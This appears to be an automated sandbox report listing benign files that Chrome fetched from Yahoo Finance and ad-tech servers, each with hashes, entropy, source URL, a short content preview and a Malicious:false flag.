                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.503616373683869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:GGJ01yJn5yOIVmxV/ZUN/4hDEwu85wWoJNmpPvIE:GGJ00JngOCyZ+8l2Wush
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C73E0CB111244BC0796DA0E83348068B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C83D2843508D6BA4827C2DCA0670FFBDD4F1E4ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9913C1ABBE147B7CC94C91FBE26B22D24F72B98F4DA5514D376A473B3D10ACD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9DF2085B42D146263164156B483EFEBB829DD49434591A2F511A4DE31E69A469DB4612C200382A9CABE10F11A3C5C52EB89AC7590F02149367BB144AC65E6CD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ads.pubmatic.com/AdServer/js/user_sync.html?p=137711&s=137812&predirect=https%3A%2F%2Fce.lijit.com%2Fmerge%3Fpid%3D58%263pid%3D&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<html><body><script type="text/javascript">(function(){var aa=window,p=navigator,ai=aa.top||aa,aj=aa.location.search.substr(1),A=encodeURIComponent,W=decodeURIComponent,aA=aa.parseInt,P=aa.PubMatic||(aa.PubMatic={}),K=0,ad=0,b=0,ao="pubmatic.com",V="ads."+ao,al=1,Q="https://",a=(aa.__cmp?1:0),an=function(aF){return typeof aF==="function"},au=console.log.bind(console,"PubMatic:"),at=function(aJ,aI){var aG=0,aF=aJ.length,aH=false;for(;aG<aF;aG++){if(aJ[aG]===aI){aH=true;break}}return aH},n=function(aF,aI){var aH=aa.document.createElement("script");aH.type="text/javascript";aH.src=aF;aH.async=true;if(an(aI)){aH.onload=aH.onreadystatechange=aI}var aG=aa.document.getElementsByTagName("script")[0];aG&&aG.parentNode&&an(aG.parentNode.appendChild)&&aG.parentNode.appendChild(aH)},aq=function(aH){var aG=aa.document.createElement("iframe");aG.src=aH;aG.style.height="0px";aG.style.width="0px";aG.style.display="none";aG.height=0;aG.width=0;aG.border="0px";aG.hspace="0";aG.vspace="0";aG.marginWidth=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8525)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8526
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.977166439123678
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:m3T4gHzfbl5YYlK9zoBbby4y1wlcTWxGwJPpDU0O4yitk4MNizq9+Foxnatn:A4gTDzYYU9zEWM30nyn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F0A7E61EA9D2D0BB563FB504EF8F5B34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:B9449D9D844B8F7299A99CDFD0E90BF742A3FAE3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7BC4719E59C7A7236F2806A1661EE6AD861F6221C5DF991BB76AB4AB5A567D3A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:ED01C095229611B873C928B63F8B65BBBF36E2D40ED3D29BE637794C6D424CC37238B388853091CD72F76C04523B5F3566E3610A84EFFD8D6C7461EA40E85034
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/StoryItem.CsmwoRFQ.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.liveBlog.yf-gpvsaf.yf-gpvsaf{display:flex;flex-flow:row wrap;gap:var(--space-1);align-items:center;justify-content:center;margin-top:-1px}.liveBlog.yf-gpvsaf .fin-icon svg{font-size:var(--icon-size, .375rem)}.liveBlog.yf-gpvsaf .livestatus.yf-gpvsaf{font-size:var(--font-s);line-height:1.25;font-weight:var(--font-bold);color:var(--negative)}.category.yf-hclwtv{background-color:var(--surface1);border-radius:var(--border-radius-s);border:1px solid var(--surface1);flex:none;font-size:var(--font-xs);line-height:1.25rem;padding-left:.375rem;padding-right:.375rem}.taxonomy-links.yf-13tszyc{align-items:center;display:flex;flex:0 1 auto;flex-wrap:wrap;gap:var(--space-1)}.live-badge.yf-1adsqgi{font-size:var(--font-s);font-weight:var(--font-bold);line-height:1.125rem;color:var(--text-inverse);background-color:var(--negative);border-radius:var(--border-radius-s);padding:.125rem .375rem;margin-bottom:var(--space-2);vertical-align:top;width:-moz-max-content;width:max-content}.live-badge.yf-1adsqgi:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (16798), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):16798
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.223409253489215
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:3+Ec6BG/PFvVHWahu22YXGjDmgTkgcpUh1HswyjIkr8EAe:OD+ipVHWa1c/TIUYjINe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F085D6C42ACB1394E457E463230DE8BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DEACA09E50FB2D08C90F07CC588A8B1B4C191732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F2C2013A67C8DD205E93EF40CF60DA7B3BB48A075E7B649FDE2B2F646B15896F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:029FDDCBD993E68E25B470D316CC94EF513AC536AB70C39F5B6920B6BEF6398F3BF77DD5F6067441337068566F1DCF408CDEC28DC22E03256E634AF644322875
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/wf/wf-fetch-1.19.1-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-fetch",[],t):"object"==typeof exports?exports["wafer-fetch"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-fetch"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var i=r[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){var r={};for(var n in e)t.indexOf(n)>=0||Object.prototype.hasOwnProperty.call(e,n)&&(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1829
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.990791462240958
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:2dVZZL8NdTv3lYAjeaxMcRcTX+TLRjUhZ88TzlSV29nLiFyGAhIhxCAOFTsWwK3p:c7R8NdTvVY6OST8883029nlhcmTNL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D216D3B4E5A67F022FA3EF4E71781439
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5E6B829187DCD592B6C4F4998F513B6B77FC9D18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:54352CC37FAFE590444BC57BE54170A6CCB8A8EEB30A618911995780FAA8462E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5878820FE8632627043FD2FDCBB65F3CB614B06A786DBF719A80165187A804D5D23A74BD8E312073ED292C07DCA4D42A39D346D35D9C0B49362AA036D9E7B413
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="32px" height="32px" viewBox="0 0 32 32" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 57.1 (83088) - https://sketch.com -->. <title>favicon_y19_32x32_custom</title>. <desc>Created with Sketch.</desc>. <defs>. <polygon id="path-1" points="0.171073913 0.0931111111 9.4455087 0.0931111111 9.4455087 9.92442222 0.171073913 9.92442222"></polygon>. </defs>. <g id="favicon_y19_32x32_custom" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <rect fill="#6001D2" x="0" y="0" width="32" height="32"></rect>. <g id="y!" transform="translate(5.000000, 6.000000)">. <polygon id="Fill-1" fill="#FFFFFF" points="9.70835927 5 7.04604411 11.4197051 4.40657437 5 0 5 4.91176421 16.0265583 3.14442407 20 7.45914574 20 14 5"></polygon>. <g id="!" transform="translate(12.000000, 0.000000)">. <path d="M2.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pixel.tapad.com/idsync/ex/receive?partner_id=1955&partner_device_id=8fa448b1-1b1e-0790-14f6-e1762159dc4b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:gzip compressed data, was "450-bundle.js", last modified: Thu Jun 27 09:13:17 2024, from Unix, original size modulo 2^32 52378
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):16716
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.988990229465861
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:vWovPjWDA0CBbtag1L+vaD33EPlXljRVykTYAJESrdjFebpQW:vPXyDAj1Ae3EPfNVtEyVQbpQW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9F26149F6A2733138723A3BC74B1F1FE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:602905DB167332C938696F103CB72F7AAD991E02
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CFF68AE0CBD3E14399432A1A828D5EFEA48BF99D9E9638BC37060DEA17507C43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:02BA9BB1AB88320DB69C9E1E708C7B74FB693C1284A5ABDA45C62E6C8186B7C656C38E282D0BEF7A9B7A8D84A188E2A8D3037CF36D44F90C9F26B88E0581A3CD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:....--}f..450-bundle.js..;.r..."s::...#;...a4n.i.8M...h|h...P...v...~w. A.r.sgn&c...}c..4[.n..&I?.\...U..%[_eI......!v..,.m.b.O....gd...g...>%.. ~.....)X*....M.d.s.....,.....0.d97..7....b.b.p..GWW...|^.v.....VPY.>.....4....w"......n....`..*..*..........p...j.XV.].w........d`V...F........y7J.,.....S>.%......"........(..a.r8.e.....J..No...y&.l.{.%E10...$YI...@v..e....b.s9H.i..2........"....V...i.wKh.g.#c...P .4..V.}.9.!.k.T.........V..Z..#....6K.i..IA.lXFQ.x......"...\.)..8z.o..y..@.0...Qc..8 ...O......|.[_...h>.#&5....Y..D..*'~^......\.....;K5<.$.....hZJ8...*.Ee...j.....4.O.9Pk"F.Q.R.x.....e..E@.A(FH0x{.@...@. ..sN.K...e2]....CR.S.,a#.3 ...6M@G.C.s..8......z.84..#u.............+..$l.D..`..,.n...T.}..q9.^.m...r........2.!P..I..5`0.(_..1.g.L.!.`.{.B.X..'.)..e<...`.G....n..|.T.....#5J.......O..9rx..-R..G0....z2#.............U ..().*M.i...?%t.'0........Z..'...G..........cs...9I@sV.....(6..J..T....v....C.c.........:eZ?[.@+..-.FR...`.Z=O....-Hf
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2482
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.618253337400248
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:TXT4eQ7M0Vk677M0Kk6+7r10Sk6H72X10ak/7e0kk27H0vu7H0v4Z:DTNQ7nVb7nKe7rKSn72KaC75kR7Uvu73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:67CD86F2B85134ECD4204CEE00DFFAF9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:07B0B211F8D722775647CA82DE48685381A9A7E3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D15E6D93C15C580E902CE7F034E60E8E9036848441137C7F336A0436BCA61D39
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:917B99E9177034AAF095BC5E1011ABC48EC07DB331B87D8FAFB0DE6DD4F7991A0CD17E3E9DC99CE5D10F2F49AD19E87C7800537D95B8BAA46AD3B54D8490DE44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{. "expCount":7,. "selection":"individual",. "uploadType":"group",. "runProb":10,. "expList":[. {. "name":"vpixiea",. "beaconRegex":"^https:\/\/v-([^.]*).wc.yahoodns.net\/i.gif",. "target":"https://v-a<RAND>.wc.yahoodns.net/i.gif",. "trials":1,. "uploadEndpoints":["https://ybar-<BEACON>report.wc.yahoodns.net/cs/"], . "timeout":5000. },. {. "name":"vpixieb",. "beaconRegex":"^https:\/\/v-([^.]*).wc.yahoodns.net\/i.gif",. "target":"https://v-b<RAND>.wc.yahoodns.net/i.gif",. "trials":1,. "uploadEndpoints":["https://ybar-<BEACON>report.wc.yahoodns.net/cs/"],. "timeout":5000. },. {. "name":"vpixiec",. "beaconRegex":"^https:\/\/v-([^.]*).wc.yahoodns.net\/pixel.gif",. "target":"https://v-c<RAND>.wc.yahoodns.net/pixel.gif",. "trials":1,. "uploadEndpoints":["http
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17353)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):17354
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.502748004372787
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:tN1B37/TjdXlsiREgZw/lLDmH3tF2cv0wLVseobi4OLe1K2crD:Pr/TjPs8ESwRmH3tF2cv0wLV5obi4OL7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2C15C9BC9B0DEACC73B1F71DE7067474
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:AC32624CF4452DA67B9C16BEE9E47098C2F72E23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E1086488781353234BA308A490CEC38D2C822397C7B13068BBA3669F514BF1C7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:22163C74F1AE3E03914FEE610E3FBB3104EF25F27D93A220F125063B50DE2D625802A66A639A32F1234216656B2D09FFE7022F87C0FF45103DAF1046B493E2EE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Tabs.6aO2IOBS.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as Oe,A as J,e as Z,b as P,p as U,d as $,f as x,i as I,j,B as ie,L as R,k as D,x as Ee,a5 as Ke,r as Ge,D as Qe,W as ge,c as He,u as we,g as ze,a as Pe,q as S,O as ne,Q as Re,l as F,G as de,v as Ue,t as re,h as fe,m as ue,n as ve,K as ke}from"./scheduler.Dsuh-FKt.js";import{S as We,i as Ye,t as h,g as E,e as H,a as k,c as q,b as L,m as V,d as y}from"./index.CvwOawEI.js";import{e as se}from"./each.CI2tb2RB.js";import{g as me,a as Fe}from"./spread.CgU5AtxT.js";import{T as Je}from"./commonUtil.BWwawKjd.js";import{c as Ze,g as oe}from"./i13nUtil.8E8_gCdn.js";import{I as ce}from"./Icon.C8w5V9EK.js";import{S as $e,O as xe}from"./Select.DMUNtRO-.js";import{T as el}from"./Tooltip.CzSuDxyY.js";import{l as je}from"./yf-lock.ClgspVU1.js";import{l as ll}from"./yf-unlock.DelAiXlN.js";import{w as tl}from"./43.BgWy8GOF.js";const al='<svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" viewBox="0 0 48 48"><path d="M24 0C10.7 0 0 10.7 0 24s10.7 24 24 24 24-10.7 24-24S37.3 0 24 0m-6.4 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1417)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1418
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.832509605176113
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:Qfhl9zrfjkY78587P8cZ8N866JB8cAXsx:QvRQXXsx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:A5887DB23436591B2607B15AB7A586A1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9F92398B5B549CCE734F11380B11CD5CCC402078
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A6607A541E7F6915E2E923FC364601006A0E84851852DA601FE3136D2DA0EE3E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4D4A67B1A04FE491623B45A4A7DEE081255584389EB9846D595BF0095E3CABBEACAC85E54B8B01492768DE3A7A958DAD0F2760B635236C7CA8D12CA36544A1AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/Icon.DgFg0-NP.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.fin-icon.yf-7v4gbg svg{width:1em;height:1em;fill:currentcolor;display:inline-block}.fin-icon.yf-7v4gbg{align-items:center;display:inline-flex}.primary-icn.yf-7v4gbg{color:var(--primary)}.tertiary-icn.yf-7v4gbg{color:var(--text2)}.action-icn.yf-7v4gbg{color:var(--ui-brand)}.positive-icn.yf-7v4gbg{color:var(--positive)}.negative-icn.yf-7v4gbg{color:var(--negative)}.following-icn.yf-7v4gbg{color:var(--following)}.white-icn.yf-7v4gbg{color:var(--white)}.success-icn.yf-7v4gbg{color:var(--toast-success)}.error-icn.yf-7v4gbg{color:var(--toast-error)}.warning-icn.yf-7v4gbg{color:var(--toast-warning)}.inherit-icn.yf-7v4gbg{color:inherit}.sz-x-small.yf-7v4gbg{font-size:var(--icon-size, var(--font-xs))}.sz-small.yf-7v4gbg{font-size:var(--icon-size, var(--font-s))}.sz-medium.yf-7v4gbg{font-size:var(--icon-size, var(--font-m))}.sz-large.yf-7v4gbg{font-size:var(--icon-size, var(--font-l))}.sz-x-large.yf-7v4gbg{font-size:var(--icon-size, var(--font-2xl))}.sz-xx-large.yf-7v4gbg{font-size:var(--icon-s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (312)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):313
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.964673423059573
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:1RzDUGcBUXXcG1ybRDhrBt6ag7Xla6lDUG+QRq3XX6XNcqFTEaqFVNB:1Rvfwv7NBtRg06Zf+bMNcqFDqFVNB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:29D34492193DB2CAB5510017102AD23F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:55BB55559FE2227EBEB69246C497096B207A2D4F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F825E4E2237A2659C41F7A5FC36BBC6F2759DFD7E29516C740B033487C8AE26C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A54FC8943093462503A659DD7F73EE0168D2191C13528A91F352E37CD730F0BF226E2425BAC7B68287BDB1B86B0BE77F446B430E19CC3B5BFED66F6E0357E2C1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/MarketsNavBar.CIf_21Zk.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.container.yf-kpoc60{padding:0;display:flex;flex-direction:column-reverse;width:100%;background-color:var(--surface1);padding-top:var(--space-3)}@media only screen and (min-width: 1050px){.container.yf-kpoc60{position:sticky;flex-direction:column;padding:var(--space-4) var(--space-4) 0 0;top:112px;width:160px}}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (10456)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):10550
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.244183326950915
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:8oo1Fjga+6rDV+rDpXnlbRVy7Su8a3f16eVqYB:O1F0L6rDV6pXnlbRVy7F3FqYB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0B9D70A277316126CF302E49197921F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F120FAE96AF8C404EAA76C28FA14BB79D9FF2A10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0926857EE0B388BA6FF0A6E66DB6E5D7BE91DB954B7431B7F71F22BB70525BFB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A231B4292B4B25A9C31C07013BF1ED6EDA7319AA52B50050A0BA6227543E2083552546A607FEAEDCC4FEF6EC90A9592ADA909A017207765A0AE54C31B146F4EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/js/common-756fe656.101e53643287a2b69051.js
